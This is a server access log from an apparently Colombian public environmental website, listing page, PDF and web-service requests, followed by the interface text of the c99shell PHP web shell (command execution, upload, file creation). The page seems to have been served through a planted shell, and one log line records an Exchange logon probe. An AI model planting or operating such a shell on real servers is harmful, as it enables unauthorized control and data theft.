186.102.16.56 - - [23/Jul/2023:22:52:52 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19yW3Gia8/GbA5v7CfdkWuNNnVAXRDFa2+lyBn6II12UQIZsliaaYtqzCI8g+d1M1RxSUPIpvy/XMstQHke7YJr9dpyfF7RFmOBiTg8iUrY3Xy4Jw/9xZR4It5fUUN0XG+VUYEP1z+1W/YJr7O9AhC3By8kmDuwJICZvEdI24VNGwud6IbvQz/9&u=U2FsdGVkX18Z4f6mJ8SgmhdvYHNMsFvcHug7c5luEg0=&y=U2FsdGVkX1+/I/MkrbX/+mdGXdzu4/GieK7+d4etykQizpXK7dNzT/9Q0KTqxxqv HTTP/1.1" 200 26
186.102.16.56 - - [23/Jul/2023:22:52:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX185whno5fM1c4duCY+LgnJ4tIz6RbOqkYYJZHbwPOTdj4xR9XvnzVVeTwuXVBD/IFs9I0QTHyAHHdj7OTf7zr2fDRbe1kddAhD75k0WNm7Xe8366dPO33m+Y+voyAxZYq6yvyKEFaoqvfLD+iJCtQHNoNTj2u9E5H2+JVu3H3p1Jlnn2/nkenr9LHtblu1FKKmAK5EK6r4zLA==&u=U2FsdGVkX18Z4f6mJ8SgmhdvYHNMsFvcHug7c5luEg0=&y=U2FsdGVkX1+/I/MkrbX/+mdGXdzu4/GieK7+d4etykQizpXK7dNzT/9Q0KTqxxqv HTTP/1.1" 200 26
186.102.16.56 - - [23/Jul/2023:22:52:53 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18gZx0cohfGCG2UayUOBeaz4qzZ6JRB+I/ku1V+6LDzFYc3UgM+pWUCOl58wo5Yio+p3OzdpLysLay0naIPT63xL7w6YTpv0OKHNfUsisYqMJmrRcvFqyXE9cyuS0tEdjVpIei87yEh8fy3+Vk0xcSfo4VsRdfhNMqqzT0VsitLqx/+8SsFQSr1UMU1fGnOtZkWupWUrKJWpA==&u=U2FsdGVkX18Z4f6mJ8SgmhdvYHNMsFvcHug7c5luEg0=&y=U2FsdGVkX1+/I/MkrbX/+mdGXdzu4/GieK7+d4etykQizpXK7dNzT/9Q0KTqxxqv HTTP/1.1" 200 26
186.102.16.56 - - [23/Jul/2023:22:53:06 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX19LxTCYYbtfR9aOV/8sbm4w2eIUF7mTvs00Zc0ykVqJHtJjMgJnICncrk1R6Taj0Z9q4xuBWWNej9yM7adbtVCZ97L4pykr9t7AJ62vCyQSlj6dgnj0iLg0Kdl97oKRdCI0qf5N2+IQ4UKDoS5fPX6y50qS6kI1k0k=&u=U2FsdGVkX18Z4f6mJ8SgmhdvYHNMsFvcHug7c5luEg0=&y=U2FsdGVkX1+/I/MkrbX/+mdGXdzu4/GieK7+d4etykQizpXK7dNzT/9Q0KTqxxqv HTTP/1.1" 200 60
216.245.221.92 - - [23/Jul/2023:22:53:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:22:53:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
173.252.107.1 - - [23/Jul/2023:22:53:50 -0500] "GET /dos-guacamayas-fueron-entregadas-en-bogota.html HTTP/1.1" 200 742
173.252.107.1 - - [23/Jul/2023:22:53:50 -0500] "GET /alista-tu-camara-y-participa-en-el-reto-naturalista-2023.html HTTP/1.1" 200 743
200.119.34.246 - - [23/Jul/2023:22:55:20 -0500] "GET /agendate-para-participar-en-las-caminatas-ecologicas-de-febrero.html HTTP/1.1" 200 830
186.102.16.56 - - [23/Jul/2023:22:56:31 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/yAJ1Plx+tr3mI/qGQUhjeeRI5tpJZA8EwA1alszJOGABAyL32HyRsBVRrn/4k2Dq1AUoW4b3EC4FxpRXhdwedvcYlENWAqGzc5BkR+xVbATbLIN2rjOaRDRHh7QLSbxIIRab10eo2aGA9LlWcH0fEYxhmWrHyw0mEncmwfAeIUNynMBe1vOUBATqwBJmX0U7hos2JMQ7bt/2Q7qFapkmKXGCDoAopWxf/4JEKO7h8GUAgwuYOeij1BoKx3ZL/L/h5ueubyGKpLQ==&u=U2FsdGVkX18Z4f6mJ8SgmhdvYHNMsFvcHug7c5luEg0=&y=U2FsdGVkX1+/I/MkrbX/+mdGXdzu4/GieK7+d4etykQizpXK7dNzT/9Q0KTqxxqv HTTP/1.1" 200 26
186.102.16.56 - - [23/Jul/2023:22:56:57 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18zb2eeeRzQHtQcYKwjaZNBBIqcnNGaXQlDWb2pBy6XD1fgLLdn6TUBJGTL945Phkk8I70K4fsqh/KgO9lNiEQAP33cQaEV6XORIResJ+tb6/KCwA0Q+GYIut29KdIQSu8vEWnimZTQgTlnyBTUKEicwnXLcsyuY8U=&u=U2FsdGVkX18Z4f6mJ8SgmhdvYHNMsFvcHug7c5luEg0=&y=U2FsdGVkX1+/I/MkrbX/+mdGXdzu4/GieK7+d4etykQizpXK7dNzT/9Q0KTqxxqv HTTP/1.1" 200 60
173.244.181.122 - - [23/Jul/2023:22:57:01 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR1lLazf6MS-wcLbycJ3HfbptdV7swEekTLJsTn6LhK_V7GmVM7d5EOKvK8 HTTP/1.1" 200 783
173.244.181.122 - - [23/Jul/2023:22:57:05 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR1lLazf6MS-wcLbycJ3HfbptdV7swEekTLJsTn6LhK_V7GmVM7d5EOKvK8 HTTP/1.1" 200 783
172.22.2.4 - - [23/Jul/2023:22:55:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60185
216.245.221.92 - - [23/Jul/2023:22:58:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:22:58:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
64.124.8.52 - - [23/Jul/2023:22:59:20 -0500] "-" 408 -
173.252.107.119 - - [23/Jul/2023:23:00:52 -0500] "GET /mujeres-que-trabajan-por-el-medioambiente-de-bogota.html HTTP/1.1" 200 724
173.252.107.10 - - [23/Jul/2023:23:00:52 -0500] "GET /mujeres-que-trabajan-por-el-medioambiente-de-bogota.html HTTP/1.1" 200 724
173.252.107.8 - - [23/Jul/2023:23:00:53 -0500] "GET /images/mujeres-cultura-31.jpg HTTP/1.1" 200 33736
173.252.79.8 - - [23/Jul/2023:23:00:54 -0500] "GET /images/mujeres-cultura-31.jpg HTTP/1.1" 200 33736
64.124.8.23 - - [23/Jul/2023:23:00:56 -0500] "-" 408 -
216.245.221.92 - - [23/Jul/2023:23:03:26 -0500] "HEAD / HTTP/1.1" 200 -
165.1.173.142 - - [23/Jul/2023:23:03:42 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/Infografia/Parte2/M-20.PNG HTTP/1.1" 304 -
201.245.192.253 - - [23/Jul/2023:23:03:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
172.22.2.4 - - [23/Jul/2023:23:02:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
65.154.226.166 - - [23/Jul/2023:23:04:03 -0500] "GET /siipev/diseno%20de%20elementos%20de%20mobiliario%20urbano/otros%20elementos/infografia/parte2/m-20.png HTTP/1.1" 200 7870
172.22.2.4 - - [23/Jul/2023:23:02:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
181.59.3.28 - - [23/Jul/2023:23:04:30 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&gclid=EAIaIQobChMI0-vvgbumgAMV_xCzAB1u3g9uEAEYASAAEgIDIvD_BwE HTTP/1.1" 200 783
201.244.246.172 - - [23/Jul/2023:23:05:44 -0500] "-" 408 -
52.167.144.147 - - [23/Jul/2023:23:07:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/4533.pdf HTTP/1.1" 304 -
173.252.127.11 - - [23/Jul/2023:23:08:16 -0500] "GET /images/cuco-americano-23-noviembre.jpg HTTP/1.1" 200 34532
216.245.221.92 - - [23/Jul/2023:23:08:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:08:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
64.124.8.59 - - [23/Jul/2023:23:09:06 -0500] "-" 408 -
18.136.4.211 - - [23/Jul/2023:23:12:32 -0500] "GET /galeria/nivo-slider/demo/convocatorias.html? HTTP/1.1" 200 3464
18.136.4.211 - - [23/Jul/2023:23:12:33 -0500] "GET /galeria/nivo-slider/demo/images/bannerconvocatoriaacercar.jpg HTTP/1.1" 200 91528
157.55.39.216 - - [23/Jul/2023:23:12:46 -0500] "GET /Publicaciones/2023EE118401.pdf HTTP/1.1" 404 228
216.245.221.92 - - [23/Jul/2023:23:13:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:13:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
172.22.2.4 - - [23/Jul/2023:23:12:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60612
216.245.221.92 - - [23/Jul/2023:23:18:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:18:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
172.22.2.4 - - [23/Jul/2023:23:17:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:19:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43155
201.245.192.253 - - [23/Jul/2023:23:19:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43633
186.84.20.162 - - [23/Jul/2023:23:19:49 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2023%2F HTTP/1.1" 200 176769
172.22.2.4 - - [23/Jul/2023:23:18:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56452
186.80.156.250 - - [23/Jul/2023:23:23:08 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&fbclid=IwAR2yUVrAIIlR6tOnhxGp43T0GWzvpaOtyouU53HvepSLw81Dnw3Prp53RFc_aem_AYxjQSGHsVuH7q4uQx2-1wQBMwdFoNrU9gzYrVqkm7gDLssjGP0ETxrMf_zhfbjZouIUVWlaU3DAMJ9MAaW6GUON HTTP/1.1" 200 783
66.249.70.197 - - [23/Jul/2023:23:23:24 -0500] "-" 408 -
216.245.221.92 - - [23/Jul/2023:23:23:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:23:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
172.22.2.4 - - [23/Jul/2023:23:23:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Jul/2023:23:24:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55337
69.63.184.117 - - [23/Jul/2023:23:26:42 -0500] "GET /olga-romero-una-mujer-que-reverdece-con-corazon-inquieto-que-encontro-en-el-reciclaje-su-pasion.html HTTP/1.1" 200 798
216.245.221.92 - - [23/Jul/2023:23:28:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:28:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
172.22.2.4 - - [23/Jul/2023:23:29:14 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2004%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 8194919
201.245.192.253 - - [23/Jul/2023:23:29:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43155
201.245.192.253 - - [23/Jul/2023:23:29:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43633
172.22.2.4 - - [23/Jul/2023:23:29:28 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Jul/2023:23:30:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54453
216.245.221.92 - - [23/Jul/2023:23:33:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:33:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
200.118.60.119 - - [23/Jul/2023:23:34:13 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
200.118.60.119 - - [23/Jul/2023:23:34:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 407265
190.84.119.147 - - [23/Jul/2023:23:35:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 382444
172.22.2.4 - - [23/Jul/2023:23:35:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Jul/2023:23:35:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 43386
172.22.2.4 - - [23/Jul/2023:23:36:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49659
130.211.54.158 - - [23/Jul/2023:23:38:16 -0500] "GET / HTTP/1.1" 200 319
157.55.39.216 - - [23/Jul/2023:23:38:19 -0500] "GET /BLA/resoluciones/AUTOS%202023/3669.pdf HTTP/1.1" 200 392811
216.245.221.92 - - [23/Jul/2023:23:38:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:38:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
157.55.39.216 - - [23/Jul/2023:23:39:09 -0500] "GET /BLA/resoluciones/AUTOS%202022/1991.pdf HTTP/1.1" 304 -
172.22.2.4 - - [23/Jul/2023:23:39:17 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 1018
172.22.2.4 - - [23/Jul/2023:23:39:21 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
201.245.192.253 - - [23/Jul/2023:23:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43155
201.245.192.253 - - [23/Jul/2023:23:39:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43633
172.22.2.4 - - [23/Jul/2023:23:41:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Jul/2023:23:43:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:43:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
172.22.2.4 - - [23/Jul/2023:23:43:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45003
172.22.2.4 - - [23/Jul/2023:23:43:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48153
172.22.2.4 - - [23/Jul/2023:23:47:08 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [23/Jul/2023:23:47:08 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [23/Jul/2023:23:47:24 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3313&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1103
172.22.2.4 - - [23/Jul/2023:23:47:24 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
181.234.202.231 - - [23/Jul/2023:23:47:40 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.234.202.231 - - [23/Jul/2023:23:47:41 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.234.202.231 - - [23/Jul/2023:23:47:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 329264
216.245.221.92 - - [23/Jul/2023:23:48:26 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Jul/2023:23:48:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
168.228.164.82 - - [23/Jul/2023:23:49:38 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [23/Jul/2023:23:53:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
216.245.221.92 - - [23/Jul/2023:23:54:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [23/Jul/2023:23:53:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53248
186.31.122.33 - - [23/Jul/2023:23:55:43 -0500] "GET /calidad-del-aire-distrito-avanza-unido-por-un-nuevo-aire.html?utm_source=Meta_DIGI&utm_medium=CPMa&utm_campaign=Aire&utm_id=Julio_2023&gclid=EAIaIQobChMIrpW32samgAMVuQlECB1jQwEpEAEYASAAEgLHBPD_BwE HTTP/1.1" 200 783
66.249.70.198 - - [23/Jul/2023:23:57:11 -0500] "-" 408 -
201.245.192.253 - - [23/Jul/2023:23:58:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42133
165.1.173.142 - - [23/Jul/2023:23:58:53 -0500] "GET /siipev/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Otros%20Elementos/Infografia/Parte2/M-143.png HTTP/1.1" 304 -
65.154.226.166 - - [23/Jul/2023:23:59:04 -0500] "GET /siipev/diseno%20de%20elementos%20de%20mobiliario%20urbano/otros%20elementos/infografia/parte2/m-143.png HTTP/1.1" 200 24704
216.245.221.92 - - [23/Jul/2023:23:59:16 -0500] "HEAD / HTTP/1.1" 200 -

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.156 ]--